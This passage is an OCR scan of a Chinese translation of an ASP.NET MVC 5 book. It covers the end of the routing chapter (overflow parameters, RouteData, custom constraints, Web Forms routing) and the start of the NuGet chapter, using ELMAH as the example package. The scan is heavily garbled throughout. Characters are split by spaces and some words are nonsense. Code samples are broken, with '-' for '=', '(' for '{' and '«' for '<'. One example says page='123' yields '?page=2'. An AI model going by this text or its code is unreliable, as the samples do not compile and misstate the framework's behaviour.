外 值 ， 可 在 参数 字典 中 指定 key， 并 它 的 值 设置 成 aull 或 空 串 。 


溢出 参数 
溢出 参数 (overflow parameter) 指 在 URL 生 成 过 程 中 使 用 但 没有 在 路 由 定义 中 指定 的 路 由 值 。 
显而易见 ， 它 具体 指 的 是 路 由 的 URL、 默 认 字典 和 约束 字典 中 的 值 。 注 意外 界 值 从 没有 作为 溢出 
参数 使 用 。 
在 路 由 生成 过 程 中 ， 使 用 的 溢出 参数 会 作为 查询 字符 串 参数 附加 在 生成 的 URIL 之 后 。 这 种 情 
形 下 ， 示 例 是 最 能 说 明 问 题 的。 假设 定义 了 下 面 的 默认 路 由 : 
public static void RegisterRoutes (RouteCollection routes) 
i routes .MapRoute ( 
"Default", 
"{controller}/{action}/{id}", 


new { controller = "Home", action = "Index", 
id = UrlParameter.Optional } 


); 
} 
现在 假设 要 使 用 上 面 定 义 的 路 由 生成 一 个 URL， 于 是 我 们 向 其 中 传递 了 一 个 额外 的 路 由 
值 一 -page=2。 注 意 ， 上 面 的 路 由 定义 中 不 包括 名 为 “page” 的 URL 参 数 。 在 本 例 中 ， 我 们 只 是 
使 用 UrlLRouteUrl 方 法 泻 染 了 URL， 而 不 是 生成 链接 : 


Q(Url.RouteUrl(new (controller-"Report", action-"List", page="123"}) 


上 述 代码 生成 的 URL 是 及 eportList?page=2。 正 如 看 到 的 , 我 们 指定 的 参数 要 足以 匹配 默认 路 
由 。 事 实 上 ， 上 述 代码 中 指定 的 参数 比 需要 的 要 多 。 在 这 种 情形 下 ， 那 些 额外 的 参数 会 作为 查询 
字符 串 参 数 附 加 到 生成 的 URL 之 后 。 需 要 记 住 的 是 : 路 由 系统 在 选择 匹配 的 路 由 时 并 不 是 精确 
地 匹配 。 它 只 是 选择 尽量 (足够 ) 匹 配 的 路 由 。 换 言 之 ， 只 要 指定 的 参数 满足 路 由 的 需要 ， 是 否 指 
定额 外 参数 则 无 关 紧 要 。 


9.3.4 ”Route 类 生成 URL 的 若干 示例 


假设 定义 了 下 面 的 路 由 : 


public static void RegisterRoutes (RouteCollection routes) 
{ 
routes.MapRoute ("report", 
"(year)/(month])/(day]", 
new ( controller = "Reports", action = "View", day = 1 } 


这 里 有 一 些 按照 下 面 的 一 般 格 式 ， 调 用 UrLRouteUrl 方 法 后 返回 的 结果 : 
QGUrl.RouteUrl(new ( paraml = valuel, param2 = value2, ..., paramN = valueN }) 
参数 及 相应 的 结果 URL 如 表 9-7 所 示 。 


表 9-7 ”GetVirtualPath 方 法 的 参数 和 结果 URL 


参数 返 回 URL 说 B 
year=2007, month=1, day-12 /2007/1/12 直接 匹配 
year-2007, month-1 /2007/1 默认 day=1 
Year-2007, month=1, day=12, /2007/1/12?category-123 “溢出 ”参数 进入 生成 的 URL 的 查询 字 
category=123 符 串 中 
Year=2007 返回 空 值 没有 为 匹配 提供 足够 的 参数 


9.4 揭秘 路 由 如 何 绑 定 到 操作 


本 节 介 绍 URI 绑 定 到 控制 器 操作 的 底层 细节 ， 从 而 使 我 们 可 以 更 透彻 地 理解 其 中 的 原理 。 此 
外 ， 本 节 还 会 详细 介绍 有 关 路 由 和 MVC 的 内 容 。 

人 们 普遍 认为 路 由 只 是 ASPNET MVC 的 一 个 特性 ， 其 实 这 是 一 种 错误 观点 。 事 实 上 ， 路 由 
仅 在 ASPNET MVC 1.0 的 前 期 阶段 是 ASPNETMVC 的 特性 之 一 , 经 过 在 一 段 时 间 发 展 之 后 , 情况 
大 有 改变 , 路 由 超出 了 ASPNETMVC 的 范围 , 成 为 一 个 普遍 使 用 的 特性 。 例如 , ASPNETDynamic 
Data 团 队 也 对 路 由 的 使 用 很 感 兴趣 ， 于 是 他 们 把 它 应 用 到 了 ASPNET Dynamic Data 中 。 此 时 ， 路 
由 已 经 变 成 一 个 非常 通用 的 特性 ， 它 既 不 包含 MVC 的 内 部 知识 ， 也 不 依赖 于 MVC。 

为 更 好 地 理解 路 由 机 制 如 何 适 应 ASPNET 请 求 管道 ， 下 面 介 绍 路 由 请 求 的 步骤 。 


注意 ”这 里 重点 讨论 在 IIS 7( 及 其 以 上 版 本 ) 集 成 模式 中 的 路 由 机 制 。IIS 7 传统 
模式 或 IIS 6 模式 中 路 由 机 制 的 用 法 有 一 些 细微 的 差别 。 在 使 用 Visual Studio 内 置 的 
Web 服 务 器 时 ， 它 的 行为 与 IS 7 集成 模式 非常 相似 。 


9.4.1 高 层次 请 求 的 路 由 管道 


当 ASPNET 处 理 请 求 时 ， 路 由 管道 主要 由 以 下 几 步 组 成 : 

(1) UrIRoutingModule 尝 试 使 用 在 RouteTable 中 注册 的 路 由 匹配 当前 请 求 。 

(2) 如 果 RouteTable 中 有 一 个 路 由 成 功 匹 配 ， 路 由 模块 就 会 从 匹配 成 功 的 路 由 中 获取 
IRouteHandler 接 口 对 象 。 

(3) 路 由 模块 调用 耻 outeHandler 接 口 的 GetHandler 方 法 ， 并 返回 用 来 处 理 请 求 的 
IHttpHandler 对 象 。 

(4) 调用 HTTP 处 理 程序 中 的 ProcessRequest 方 法 ， 然 后 把 要 处 理 的 请 求 传递 给 它 。 

(5) 在 ASPNET MVC 中 ，IRouteHandler 是 MvcRouteHandler 类 的 一 个 实例 ，MvcRouteHandler 
转 而 返回 一 个 实现 了 IHttpHandler 接 口 的 MvcHandler 对 象 .返回 的 MvcHandler 对 象 主 要 用 来 实例 化 
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控制 器 ， 并 调用 该 实例 化 的 控制 器 上 的 操作 方法 。 


942 ”路 由 数据 


正如 前 面部 分 提 到 的 ， 调 用 GetRouteData 方 法 会 返回 RouteData 的 一 个 实例 。RouteData 具 体 是 什 
AWE? 原来 ，RouteData 中 包含 了 关于 匹配 请 求 的 路 由 信息 。 

前 面部 分 展示 的 路 由 带 有 如 下 URL: {controller}/{action}/{id}。 当 请 求 /albums/ lisy123 传 入 时 ， 
该 路 由 就 会 尝试 匹配 传 入 的 请 求 。 如 果 匹 配 成 功 ， 它 就 创建 一 个 字典 ， 其 中 包含 了 从 URL 中 解析 
出 的 信息 。 确 切 地 讲 ， 路 由 还 会 向 Values 字 典 中 为 URL 中 的 每 个 路 由 参数 添加 一 个 键 。 

对 于 传统 路 由 {controller}/{action}/{id}，Values 字 典 中 应 该 至 少 包 含 三 个 键 , 分 别 是 controller、 
action 和 id。 如 果 传 入 的 URL 是 对 /albums/list/123 的 请 求 ， 路 由 就 会 解析 该 请 求 的 URL， 并 为 字典 
的 键 提供 值 。 本 例 中 ， 字 上 典 中 “controller” 键 的 值 为 albums，“action” 键 的 值 为 list, “id” 键 的 
值 是 123。 

对 于 特性 路 由 ，MVC 使 用 DataTokens 字 和 典 来 存储 更 精确 的 信息 ， 而 不 只 是 操作 名 称 字符 串 。 
具体 来 说 ， 它 包含 一 个 操作 描述 符 列表 ， 这 些 描述 符 直 接 指向 路 由 匹配 时 可 能 使 用 的 操作 方法 。 
对 于 控制 器 级 别 的 特性 路 由 ， 列 表 中 将 有 不 止 一 个 操作 。 

在 整个 MVC 中 都 有 用 到 的 RequestContext 的 RouteData 属 性 保存 着 外 界 路 由 值 。 


9.5 自 定 义 路 由 约束 


前 面 的 9.2.4 节 的 “路 由 约束 ”小 节 已 经 详细 介绍 了 在 传统 路 由 中 ， 如 何 使 用 正则 表达 式 来 对 
路 由 匹配 进行 细 粒 度 的 控制 。 正 如 前 面 讲 到 的 ，RouteValueDictionary 类 是 一 个 由 字符 串 / 对 象 对 组 
成 的 字典 。 在 传统 路 由 中 ， 当 字符 串 作 为 约束 传递 进来 时 ，Route 类 就 会 把 该 字符 串 解释 为 正则 表 
达 式 约束 。 除 此 之 外 ， 我 们 还 可 以 传递 正则 表达 式 字符 串 之 外 的 约束 。 

路 由 提供 了 一 个 具有 单一 Match 方 法 的 IRouteConstraint 接 口 。 下 面 给 出 了 该 接口 的 定义 : 


public interface IRouteConstraint 
{ 
bool Match (HttpContextBase httpContext, Route route, string parameterName, 
RouteValueDictionary values, RouteDirection routeDirection); 
} 


当 路 由 评估 路 由 约束 时 ， 如 果 约 束 值 实现 了 IRouteConstraint 接 口 ， 那 么 这 就 会 导致 路 由 引擎 
调用 路 由 约束 上 的 了 RouteConstraint Match 方 法 ， 以 确定 约束 是 否 满足 给 定 的 请 求 。 

会 为 传 入 URL 以 及 在 生成 URL 时 运行 路 由 约束 。 通 常 需要 自 定义 路 由 约束 来 检查 Match 方 法 
的 routeDirection 参 数 ， 从 而 根据 调用 时 间 来 应 用 不 同 逻 辑 。 

路 由 本 身 以 HttpMethodConstraint 类 的 形式 提供 了 TRouteConstraint 接 口 的 一 个 实现 。 这 一 约束 
允许 我 们 指定 的 路 由 只 能 匹配 特定 的 HTTP 方 法 (动词 集 。 

例如 ， 如 果 想 定义 一 个 路 由 ， 使 其 只 响应 GET 请 求 ， 而 不 响应 POST、PUT 和 DELETE 请 求 ， 
那么 我 们 可 以 这 样 定义 : 

routes.MapRoute ("name", "{controller}", null, 

new { httpMethod = new HttpMethodConstraint ("GET")} ); 


注意 ， 自 定义 约束 没有 必要 关联 URL 参 数 ， 因 此 可 以 提供 基于 多 个 路 由 参数 或 
一 些 其 他 信息 (本 例 中 的 请 求 头 ) 的 约束 。 


| 


MVC 也 在 System Web.Mvc.Routing.Constraints 名 称 空间 中 提供 了 许多 自 定义 约束 ， 其 中 就 包 
含 特性 路 由 使 用 的 内 联 约束 。 我 们 也 可 以 在 传统 路 由 中 使 用 这 些 约束 。 例如， 要 在 传统 路 由 中 使 
用 特性 路 由 的 {id:int} 内 联 约束 ， 可 以 编写 下 面 的 代码 : 


routes.MapRoute ("sample", "{controller}/{action}/{id}", null, 
new ( id = new IntRouteConstraint() }); 


9.6 Web Forms 和 路 由 机 制 


和 Web Forms 一 起 使 用 。 本 节 首 先 看 一 个 简单 的 场合 一 ASPNET 4， 因 为 它 提供 了 对 路 由 和 Web 
Forms 的 完整 支持 。 

在 ASPNET 4 中 ， 我 们 可 以 向 Global.asax 文 件 中 添加 对 System Web.Routing 的 引用 ， 还 能 够 以 
几乎 和 ASPNETMVC 应 用 程序 一 样 的 格式 ， 声 明 Web Forms 路 由 : 


void Application Start(object sender, EventArgs e) 
{ 


RegisterRoutes (RouteTable.Routes); 
) 
private void RegisterRoutes (RouteCollection routes) 
t 
routes.MapPageRoute ( 
"product-search", 
"albums/search/([(term)", 
"^/AlbumSearch.aspx"); 
) 


Web Forms 路 由 与 MVC 路 由 仅 有 的 区 别 是 最 后 一 个 参数 ， 它 可 以 把 路 由 定向 到 一 个 Web 
Forms 页 面 。 然 后 使 用 Page.RouteData 访 问 路 由 参数 值 ， 代 码 如 下 : 
protected void Page Load(object sender, EventArgs e) 


{ 
string term = RouteData.Values["term"] as string; 


Labell.Text = "Search Results for: " + Server.HtmlEncode (term); 
ListViewl.DataSource - GetSearchResults (term); 
ListViewl.DataBind(); 

} 


我 们 也 可 以 在 标记 中 使 用 Route 值 ， 使 用 新 的 <asp 了 RouteParameter> 对 象 把 段 值 绑 定 到 数据 库 
查询 或 命令 。 例 如 ， 使 用 前 面 的 路 由 ， 如 果 浏 览 到 /albums/search/beck， 我 们 可 以 通过 传递 的 路 由 
值 使 用 下 面 的 SQL 命令 来 查询 : 


<asp:SqlDataSource id-"SqlDataSourcel" runat="server" 
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ConnectionString-"«$$ ConnectionStrings:Northwind $5" 

SelectCommand-"SELECT * FROM Albums WHERE Name LIKE 8searchterm + '$'"» 
«SelectParameters» 

«asp:RouteParameter name-"searchterm" RouteKey-"term" /» 
«/SelectParameters» 
«/asp:SqlDataSource» 


也 可 通过 使 用 RouteValueExpressionBuilder 写 出 一 个 路 由 参数 , 这 样 比 使 用 Page.RouteValue["key"] 
要 优雅 些 。 如 果 想 在 一 个 标签 中 写 出 查询 术语 ， 我 们 可 以 使 用 下 面 的 代码 : 


<asp:Label ID-"Labell" runat="server" Text-"«$$RouteValue:Term$»" /> 
可 在 代码 隐藏 逻辑 方法 中 使 用 Page.GetRouteUrl0 来 生成 传 出 的 URL: 


string url = Page.GetRouteUrl( 
"product-search", 
new ( term = "chai" ]); 


相应 的 RouteUrlExpressionBuilder 支 持 使 用 路 由 生成 传 出 的 URL: 


«asp:HyperLink ID-"HyperLinkl" 
runat-"server" 
NavigateUrl-"«$$RouteUrl:Term-Chai$»"» 

Search for Chai 

«/asp:HyperLink» 


9.7 小结 


路 由 机 制 非常 类 似 于 中 国 的 围棋 游戏 , 简单 易学 但 却 需要 一 生 的 时 间 去 掌握 。 即使 不 是 一 生 ， 
也 至 少 需要 一 些 天 。 路 由 的 概念 虽然 简单 ， 但 它 却 可 以 应 用 于 极其 复杂 的 ASPNET MVC( 和 Web 
Fomms) 应 用 中 ， 本 章 对 这 些 内 容 都 做 了 详细 介绍 。 


NuGet 


本 章 主要 内 容 
NuGet 概述 

e. 以 包 的 形式 添加 库 

e 创建 包 

e 发 布 包 

本 章 代 码 下 载 : 

在 以 下 网 址 的 Download Code 选项 卡 中 ， 可 找到 本 章 的 代码 下 载 : 
http://www.wrox.com/go/proaspnetmvc5。 本 章 的 代码 包含 在 文件 Wrox.ProMvc5.C10.zip 中 。 


对 于 NET 和 Visual Studio 而 言 ，NuGet 是 一 个 NET 包 管理 系统 ， 它 可 以 很 容易 地 向 应 
用 程序 中 添加 、 更 新 和 删除 外 部 库 及 其 依赖 。 此 外 ，NuGet 也 使 得 创建 与 他 人 的 分 享 包 变 得 
容易 。 本 章 介绍 了 NuGet 在 应 用 程序 开发 流程 中 的 基本 用 法 ， 并 在 此 基础 之 上 ， 又 进一步 讲 
解 了 它 的 一 些 高 级 用 法 。 


10.4 NuGet 概述 


要 尽 可 能 地 尝试 ， 不 要 指望 Microsoft 为 我 们 提供 所 需要 的 每 一 段 代 码 。 在 NET 平台 上 
进行 开发 的 开发 人 员 多 达 数 百 万 甚至 上 千 万 ， 而 每 一 个 开发 人 员 都 有 其 独特 的 技术 和 或 待 解 
决 的 问题 。 等 待 Microsoft 去 解决 每 个 开发 人 员 的 每 个 问题 ， 既 形 不 成 规模 ， 也 没有 意义 。 

然而 ， 值 得 庆幸 的 是 ， 许 多 开发 人 员 都 不 用 再 “ 自 扫 门 前 雪 ”， 他 们 可 以 通过 网 上 发 布 
的 一 些 库 来 解决 他 们 或 他 们 客户 的 问题 。 

面 对 网 上 这 些 有 用 的 库 ， 我 们 面临 三 大 挑战 : 发 现 、 安 装 和 维护 。 也 就 是 说 ， 开 发 人 员 
如 何 找到 需要 的 库 ? 找到 之 后 ， 如 何在 项 目 中 利用 这 些 库 ? 安装 后 ， 如 何 跟踪 项 目 更 新 ? 

在 介绍 NuGet 如 何 获取 ELMAH 库 之 前 , 本 节 首先 快速 浏览 一 下 在 NuGet 出 现 以 前 获取 
包 的 步骤 。ELMAH 代表 错误 日 志 记 录 模 块 (Error Logging Module) 和 处 理 程序 (Handler), 主要 
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来 记录 和 显示 Web 应 用 程序 中 未 显示 的 异常 信息 。NuGet 团队 非常 熟悉 这 些 步 又， 因为 我 
们 在 NuGet.org 站 点 上 使 用 了 ELMAH， 这 些 内 容 会 在 第 17 章 进行 讨论 。 

在 不 利用 NuGet 的 情况 下 使 用 ELMAH， 可 按 以 下 步骤 操作 : 

(1) 首先 找到 ELMAH: ELMAH 是 一 个 唯一 的 名 称 ， 因 此 使 用 任何 搜索 引擎 都 可 以 很 轻 
松 地 找到 它 。 

(2) 下 载 正确 的 zip 包 : 页 面 上 会 有 多 个 zip 文件 供 选择 下 载 ， 根 据 笔 者 的 个 人 经 验 ， 选 
择 正 确 文 件 下 载 并 不 总 是 容易 的 。 

G) “解除 阻止 ” 包 : 从 网 上 下 载 的 文件 都 标记 有 它们 来 自 “Web 区 域 ”， 存 在 潜在 的 不 
安全 信息 。 该 标记 有 时 称 为 “Web 标记 ”。 在 解压 缩 文件 之 前 ， 解 除 阻止 压缩 文件 非常 重要 ， 
否则 里 面 的 每 个 文件 都 会 有 位 设置 (bit seb， 这 样 就 会 导致 我 们 的 代码 在 一 些 应 用 场合 中 不 能 
正常 工作 。 如 果 对 如 何 设置 Web 标记 感 兴趣 ， 可 参阅 “Windows 附件 管理 器 工作 方式 说 明 ”， 
Windows 附件 管理 器 专门 负责 保护 操作 系统 免 受 潜在 的 不 安全 附件 的 威胁 ， 网 址 为 
http://support.microsoft.com/kb/883260 . 

(4) 确认 下 载 文 件 的 哈 希 值 与 宿主 环境 提供 的 哈 希 值 相符 : 核实 下 载 文件 的 哈 希 值 是 否 
与 下 载 页 面 提供 的 哈 希 值 相 符 ， 以 确保 下 载 的 文件 没有 被 修改 。 

(5) 把 包 解 压缩 到 合适 位 置 : 通常 情况 下 ， 我 们 会 解压 到 lib 文件 夹 下 ， 以 便 引用 这 些 程 
FE. 开发 人 员 通 常 不 把 程序 集 添加 到 bin. 目录 下 , 否则 bin 目录 会 被 添加 到 源 代码 控制 。 

(6) 添加 程序 集 引 用 : 在 Visual Studio Project 中 添加 对 程序 集 的 引用 。 

(7) 更 新 web.config: ELMAH 要 求 一 些 配 置 。 通常 情况 下 , 程序 会 在 web.config 文档 中 
搜索 正确 的 设置 。 

由 于 ELMAH 库 没有 依赖 库 ， 因 此 采用 以 上 步骤 即 可 将 其 添加 到 Visual Studio 项 目 
中 ! 如 果 添 加 的 库 拥有 依赖 库 ， 那 么 每 次 更 新 它 时 ， 我 们 都 需要 查找 它 的 每 个 依赖 库 的 正确 
版 本 ， 并 为 找到 的 每 个 依赖 库 版 本 重复 以 上 步骤 。 这 样 一 来 ， 在 每 次 准备 部 署 应 用 程序 的 新 
版 本 时 , 都 要 承担 一 系列 痛苦 的 任务 , 这 也 是 许多 项 目 组 都 长 时 间 地 坚持 依赖 旧版 本 包 的 原因 。 

NuGet 可 以 帮助 我 们 消除 这 些 痛 苦 。 它 可 以 自动 完成 所 有 这 些 普 遍 而 乏味 的 工作 ， 即 
NuGet 会 自动 完成 当前 包 及 其 依赖 包 的 安装 和 更 新 。 这 样 几乎 消除 了 在 项 目 资源 树 中 添加 第 
三 方 开源 库 的 一 切 困难 。 当 然 ， 是 否 能 够 合适 地 使 用 这 些 第 三 方 开源 库 ， 仍 取决 于 我 们 自己 。 


10.2 ”以 包 的 形式 添加 库 


Visual Studio 2012 和 2013 中 都 包含 了 NuGet; 在 之 前 的 Visual Studio 2012 中 , 则 需要 单独 
进行 安装 。 通 过 一 个 Visual Studio 扩展 可 安装 NuGet， 大 概 每 隔 几 个 月 就 有 更 新 可 用 。 

在 Visual Studio 中 与 NuGet 交互 有 两 种 方式 : Manage NuGet Packages 对 话 框 和 Package 
Manager Console 控制 台 。 这 里 首先 介绍 对 话 框 ， 之 后 再 介绍 控制 台 。 可 通过 右 击 Solution 
Explorer 中 的 References 节点 来 打开 项 目的 Manage NuGet Packages 对 话 框 ， 如 图 10-1 所 示 。 
除 此 之 外 ， 我 们 还 可 以 通过 右 击 项 目 名 称 或 者 使 用 Tools | Library Package Manager 菜单 来 打 
开 该 对 话 框 。 
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Add Reference. 
Add Senice Reference.. 
B Manage NuGet Packages.. 


config 
D Project Resdme html 
P Y) Webconfig 


图 10-1 


Manage NuGet Packages 对 话 框 看 起 来 类 似 于 Extension Manager 对 话 框 ， 这 给 一 些 人 带 
来 了 困惑 ， 其 实 二 者 的 区 别 是 非常 清楚 的 。Visual Studio Extension Manager 对 话 框 主要 用 来 
安装 增强 Visual Studio 的 扩展 。 这 些 扩展 不 会 作为 我 们 应 用 程序 的 一 部 分 进行 部 署 。 与 此 相 
反 ，NuGet 是 用 来 安装 扩展 我 们 应 用 程序 的 包 ， 并 且 这 些 扩展 包 包 含 在 程序 内 。 大 多 数 情 况 


下 ， 这 些 包 是 作为 程序 的 一 部 分 部 署 的 。 


此 外 ，Manage NuGet Packages 对 话 框 与 Extension Manager 的 另 一 点 不 同 是 ，Manage 
NuGet Packages 对 话 框 默认 显示 上 次 关闭 时 显示 的 节点 。 我 们 通过 单 击 左 侧 窗 格 中 的 Online 
节点 ， 可 以 查看 NuGet 源 (feed) 中 可 下 载 安装 的 包 ， 如 图 10-2 所 示 。 
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如 果 不 嫌 麻 烦 ， 可 使 用 对 话 框 底部 的 分 页 链接 来 逐 页 查找 包 列表 ， 直 到 找到 想 要 的 包 ， 


但 是 最 快捷 的 方式 是 使 用 右上 角 的 搜索 栏 。 
当选 择 一 个 包 时 ， 对 话 框 右 侧 的 窗 格 就 会 


显示 该 包 的 相关 信息 。 图 10-3 展 示 了 SignalR 包 的 
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信息 窗 格 。 
信息 窗 格 中 提供 了 以 下 信息 : 
。 创建 者 : 原始 库 的 作者 列表 。 该 


者 ， 只 显示 作者 。 包 的 所 有 者 可 能 不 同 于 库 的 作者 。 powers 


sigah 


Created by: Microsoft 


列表 不 显示 包 的 所 有 | 多 es 


License. 


例如 ，Bootstrap 包 归 Outercurve Foundation 所 有 及 维 WU 
护 ， 但 是 其 代码 则 由 Mark Otto 和 Jacob Thornton 编 mem 
写 ， 所 以 “创建 者 ”部 分 显示 的 是 Mark 和 Jacob. pe e 
e Id: 包 的 标识 。 当 使 用 Package Manager Console 安装 es DES A: 
包 时 ， 可 以 使 用 这 个 id 来 标识 包 。 ET 
e 版 本 : 包 的 版 本 号 。 通 常 与 包含 的 库 的 版 本 号 一 至 um 
但 未 必 如 此 。 EE 
e 最 后 发 布 ， 指 出 该 版 本 的 包 最 后 发 布 到 源 (feed) 时 的 Pc 
日 期 。 图 10-3 


下 载 : 当前 包 被 下 载 的 次 数 。 


许可 条 款 : 单 击 该 链接 可 查看 包 的 许可 条 款 。 

项 目 信息 : 通过 该 链接 可 以 导航 到 包 的 项 目 页 面 。 

举报 : 使 用 该 链接 可 以 举报 受 损 或 恶意 的 包 。 

描述 : 包 的 作者 对 包 的 简短 说 明 ， 这 是 一 个 了 解 包 的 极 好 地 方 。 

标签 : 标签 列 出 了 包 的 一 组 主题 或 特性 。 它 可 以 帮助 潜在 用 户 查 找 包 ， 人 允许 这 些 用 户 
按 主 题 而 不 是 名 称 搜索 包 。 例如， 


一 个 对 websockets 感 兴趣 的 开发 人 员 可 能 不 知道 他 


所 寻找 的 解决 方案 叫做 SignalR 。 
e 依赖 项 : 该 包 所 依赖 的 包 的 列表 。 
正如 在 图 10-3 中 看 到 的 ，SignalR 包 依 赖 于 其 他 两 个 包 : Microsoft.AspNet.SignalR.JS 和 


Microsoft. AspNet.SignalR.SystemWeb。 17 
会 对 该 文件 进行 详细 介绍 。 


10.2.2 RRE 


显示 的 这 些 信息 由 相应 包 的 NuSpec 文件 控制 ， 本 章 后 


要 安装 ELMAH 包 ， 需 执行 以 下 两 个 操作 : 


(1) 在 搜索 框 中 输入 ELMAH。 这 是 


有 会 得 到 几 个 与 ELMAH 相关 的 包 ， 其 中 最 上 面 的 结 


果 是 主 ELMAH 包 ， 它 的 描述 和 下 载 数 都 说 明了 这 一 点 。 
(2) 找到 想 要 的 包 后 ， 单 击 Install 按钮 ， 进 行 安装 。 安 装 程序 在 向 项 目 中 安装 ELMAH 
包 之 前 ， 会 下 载 ELMAH 及 其 所 有 的 依赖 包 


O 注意 ， 一 些 情况 下 ， 系 统 会 提示 我 们 接受 包 的 许可 条 款 ， 同 样 ， 它 的 一 些 


依赖 包 可 能 也 要 求 接 受 


许可 条 款 。 图 104 展 示 了 当 试 图 安装 


MicrosoftAspNetSignalR 包 时 的 画面 。 要 求 接受 许可 条 款 ， 它 们 是 由 包 的 作者 


在 包 中 设置 的 。 如 果 拒 绝 许可 
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当 NuGet 安装 ELMAH 时 ， 我 们 的 项 目 会 有 一 些 改变 。 当 第 一 个 包 安 装 到 项 目 时 ， 我 们 
的 项 目 中 会 添加 一 个 名 为 packages.config 的 文件 ， 如 图 10-5 所 示 。 由 于 ASPNET MVC 5 项 目 
模板 本 身 会 包含 一 些 NuGet 包 , 因此 packages.config 文件 会 出 现在 新 创建 的 ASPNET MVC 5 
项 目 中 。 同 时 ， 该 文件 保存 有 项 目 中 已 安装 包 的 列表 。 


The following package(s) require a cick-to-accept license 


P S) Globalamar 


By clicking "I Accept," you agree to the license terms for the package 
(5) listed above. If you do not agree to the license terms, click "I 
Decline." 


lDecine | [ I Accept 


图 10-4 


packages.config 文件 的 格式 非常 简单 。 下 面 是 ELMAH 1.2.2 版 本 的 包 在 安装 时 所 添加 文 
件 的 内 容 (省 略 了 ASPNET MVC 应 用 程序 中 包含 的 其 他 标准 库 ): 
<?xml version-"1.0" encoding-"utf-8"?» 
«packages» 
«package id-"elmah" version-"1.2.2" targetFramework-"net451" /> 
«package id-"elmah.corelibrary" version-"1.2.2" targetFramework-"net451" /> 
«/packages» 


从 上 面 的 代码 可 以 看 出 ， 现 在 我 们 有 一 个 对 Elmah.dll 程序 集 的 引用 ， 如 图 10-6 所 示 。 

程序 集 从 哪里 引用 的 呢 ? 为 回答 这 个 问题 ， 我 们 需要 查看 在 包 安 装 完 成 后 ， 解 决 方案 中 
都 添加 了 哪些 文件 。 当 第 一 个 包 安装 到 项 目 中 时 ， 安 装 程序 会 在 解决 方案 文件 所 在 的 目录 下 
创建 一 个 名 为 packages 的 文件 夹 ， 如 图 10-7 所 示 。 


à -2 > 
Search Solution Explorer (Ctrl 


RI Solution 'StarDotOne' (1 project) ^ 
tarDotOne 


h packages 

BB WebApplication 

BB WebApplication35.sin 

局 WebApplication35v12suo 


图 10-7 


每 个 安装 的 包 都 要 在 packages 文件 夹 中 创建 一 个 与 之 对 应 的 子 文件 夹 。 图 10-8 展 示 了 一 
个 包含 多 个 安装 包 的 packages 文件 夹 。 
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图 10-8 


© 注意 “这些 包 文件 夫 名 称 中 都 含有 包 的 版 本 号 ， 因 为 packages IHRES | 
T 了 为 指定 解决 方案 安装 的 所 有 包 ， 而 对 于 安装 有 同一 个 包 的 不 同 版 本 的 两 个 项 
| 目 来 说 ， 它 们 很 有 可 能 就 在 同一 解决 方案 中 。 | 

图 10-8 也 展示 了 ELMAH 包 所 对 应 文件 夹 中 的 内 容 ， 其 中 包含 包 的 内 容 以 及 以 .nupkg X 
件 格式 存储 的 原始 包 。 

lib 文件 夹 包 含 ELMAH FEFE, AE, 它 是 ELMAH 程序 集 引 用 的 位 置 。 一 些 团队 选择 
把 packages 提交 到 版 本 控制 系统 中 ,但 是 一 般 不 推荐 这 么 做 ， 尤 其 不 要 提交 到 分 布 式 版 本 控 
制 系统 (如 Git 和 MercuriaD) 中 。 本章 后 面 的 “修复 包 ” 小 节 会 介绍 ， 构 建 项 目的 过 程 中 , NuGet 
会 自动 下 载 项 目 中 缺少 、 但 是 packages.config 文件 中 引用 了 的 包 。 

content 文件 夹 包 含 直接 复制 到 项 目 根 目 录 下 的 文件 。 当 被 复制 到 项 目 中 时 ， 我 们 需要 维 
护 content 文件 夹 的 目录 结构 。 该 文件 夹 可 能 也 包含 源 代码 和 配置 文件 的 转换 ， 这 一 点 后 面 会 
进一步 讲解 。 在 ELMAH 的 例子 中 ， 会 有 一 个 web.config transform 文件 ， 它 使 用 ELMAH 要 求 
的 设置 更 新 web.config 文件 ， 如 下 面 的 代码 所 示 ; 


<?xml version-"1.0" encoding-"utf-8"?» 
«configuration» 
«configSections» 
XsectionGroup name-"elmah"» 
Xsection name-"security" requirePermission-"false" 
type-"Elmah.SecuritySectionHandler, Elmah" /» 
Xsection name-"errorLog" requirePermission-"false" 
type-"Elmah.ErrorLogSectionHandler, Elmah" /» 
Xsection name-"errorMail" requirePermission-"false" 
type-"Elmah.ErrorMailSectionHandler, Elmah" /» 
Xsection name-"errorFilter" requirePermission-"false" 
type-"Elmah.ErrorFilterSectionHandler, Elmah" /» 
«/sectionGroup» 
«/configSections» 


«/configuration» 

有 些 包 还 包含 一 个 tools 文件 夹 ， 其 中 可 能 包含 PowerShell 脚本 和 其 他 可 执行 文件 ， 本 
章 后 面 会 详细 介绍 这 些 内 容 。 

完成 所 有 这 些 设置 后 ， 现 在 可 以 自由 地 利用 项 目 中 引用 的 外 部 库 ， 享 受 完 整 的 智能 感知 
功能 和 编程 访问 库 的 好 处 。 在 ELMAH 例子 中 ， 我 们 不 需要 编写 额外 的 代码 。 要 想 查看 
ELMAH 的 工作 状况 ， 运 行 应 用 程序 并 访问 /elmah.axd 即 可 ， 运 行 效果 如 图 10-9 所 示 。 
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reserved. Licensed under Apache License, Version 2.0. Server date is Saturday, 25 January 
TOM. ev time is 00:55:26. All dates and m ILI are in the Padfic Standard 

e. This loq is provided by the In-Mem. 


图 10-9 


注意 正如 在 上 面 所 看 到 的 , 一 旦 成 功 安装 NuGet, 向 项 目 中 添加 ELMAH 
就 会 变 得 非常 容易 ， 只 需要 在 NuGet 对 话 框 中 找到 它 ， 然 后 单 击 Install 按钮 即 
可 。NuGet 可 以 自动 完成 所 有 那些 将 库 添 加 到 项 目 中 的 枯燥 的 固定 步骤 ， 以 使 
程序 可 以 立即 引用 它 。 


10.23 更 新 包 


NuGet 不 只 会 帮助 安装 包 ， 也 帮助 我 们 在 安装 包 后 维护 包 。 假 设 我 们 在 项 目 中 已 经 安装 
了 十 几 个 包 ， 现 在 想 把 安装 的 每 一 个 包 更 新 到 最 新 版 本 。 在 没有 安装 NuGet 以 前 ， 这 是 一 个 
非常 耗 时 的 任务 ， 我 们 需要 登录 到 每 一 个 库 的 首页 ， 查 找 与 该 库 对 应 的 最 新 版 本 。 

在 安装 了 NuGet 后 ， 我 们 只 需要 单 击 对 话 框 左 侧 窗 格 中 的 Updates 节点 ， 然 后 在 中 间 窗 
格 中 将 显示 当前 项 目 中 有 较 新 版 本 的 包 的 列表 , 单 击 紧 挨 着 每 个 包 的 Update 按钮 , 将 该 包 升 
级 至 最 新 版 本 。 这 也 会 更 新 包 的 所 有 依赖 ， 以 确保 只 安装 依赖 的 兼容 版 本 。 


10.234 BRE 


